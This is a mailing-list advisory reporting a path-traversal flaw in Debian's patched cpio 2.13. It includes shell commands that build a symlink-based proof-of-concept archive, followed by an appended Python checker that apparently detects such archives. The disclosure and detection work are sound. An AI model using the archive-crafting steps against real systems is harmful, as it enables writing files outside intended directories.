Message-ID: <65846ba9.7d4fbb18.bm000@oddnet.de>
Date: Thu, 21 Dec 2023 17:44:50 +0100
From: Ingo Brückl <ib@...net.de>
To: oss-security@...ts.openwall.com
Subject: Security vulnerability in Debian's cpio 2.13

Debian has applied patch "revert-CVE-2015-1197-handling" to cpio
(2.13+dfsg-7.1) to "Fix a regression in handling of CVE-2015-1197 &
--no-absolute-filenames by reverting part of an upstream commit." and to
close Debian bugs #946267 ("cpio -i --no-absolute-filenames breaks symlinks
starting with / or /..") and #946469 ("initramfs-tools-core: unmkinitrams
creates broken binaries").

This patch made Debian cpio 2.13 vulnerable to path traversal.

The vulnerability has been reported to the Debian bug tracking system:

  https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1059163

Instructions to craft a cpio archive to demonstrate the vulnerability:

  mkdir test_cpio
  ln -sf /tmp/ test_cpio/tmp
  echo "TEST Traversal" > test_cpio/tmpYtrav.txt
  cd test_cpio/
  ls | cpio -ov > ../trav.cpio
  cd ../
  sed -i s/"tmpY"/"tmp\/"/g trav.cpio

Even

  cpio -id --no-absolute-filenames -I trav.cpio

doesn't prevent path traversal with Debian's cpio, although it does with the
original cpio.

Ingo
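
A pre-extraction check for the archive layout described above, as an added example that is not part of the original post: it lists members that would be written beneath a path an earlier member of the same archive creates as a symlink. It assumes the little-endian old binary ("bin") format that GNU cpio writes by default in copy-out mode; the names `entries`, `symlink_traversals`, `member` and `SAMPLE` are hypothetical, and the sample archive is constructed in memory.

```python
import struct

MAGIC = 0o070707                      # old binary ("bin") cpio magic
S_IFMT, S_IFLNK = 0o170000, 0o120000  # file-type mask and symlink type bits

def entries(buf):
    """Yield (name, mode, data) for each member of a little-endian bin archive."""
    off = 0
    while off + 26 <= len(buf):
        h = struct.unpack_from("<13H", buf, off)   # 13 16-bit header fields
        if h[0] != MAGIC:
            raise ValueError("not a little-endian bin cpio header at %d" % off)
        namesize, filesize = h[10], (h[11] << 16) | h[12]
        off += 26
        name = buf[off:off + namesize - 1].decode("utf-8", "replace")
        off += namesize + (namesize & 1)      # names are padded to even length
        data = buf[off:off + filesize]
        off += filesize + (filesize & 1)      # so is member data
        if name == "TRAILER!!!":
            return
        yield name, h[3], data

def symlink_traversals(buf):
    """Return [(member, symlink, target)] for members stored under an archived symlink."""
    links, hits = {}, []
    for name, mode, data in entries(buf):
        parts = [p for p in name.split("/") if p not in ("", ".")]
        for i in range(1, len(parts)):        # every proper path prefix
            prefix = "/".join(parts[:i])
            if prefix in links:
                hits.append((name, prefix, links[prefix]))
                break
        if mode & S_IFMT == S_IFLNK:          # symlink target is the member data
            links["/".join(parts)] = data.decode("utf-8", "replace")
    return hits

def member(name, mode, data=b""):
    """Build one bin-format member (used only for the constructed sample)."""
    n = name.encode() + b"\0"
    hdr = struct.pack("<13H", MAGIC, 0, 0, mode, 0, 0, 1, 0, 0, 0,
                      len(n), len(data) >> 16, len(data) & 0xFFFF)
    return hdr + n + b"\0" * (len(n) & 1) + data + b"\0" * (len(data) & 1)

# Constructed sample with the same member layout as the archive in the post.
SAMPLE = (member("tmp", 0o120777, b"/tmp/")
          + member("tmp/trav.txt", 0o100644, b"TEST Traversal\n")
          + member("TRAILER!!!", 0))
```

`symlink_traversals(open("trav.cpio", "rb").read())` runs the same check on an archive file; an empty list means no member is stored beneath an archived symlink.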
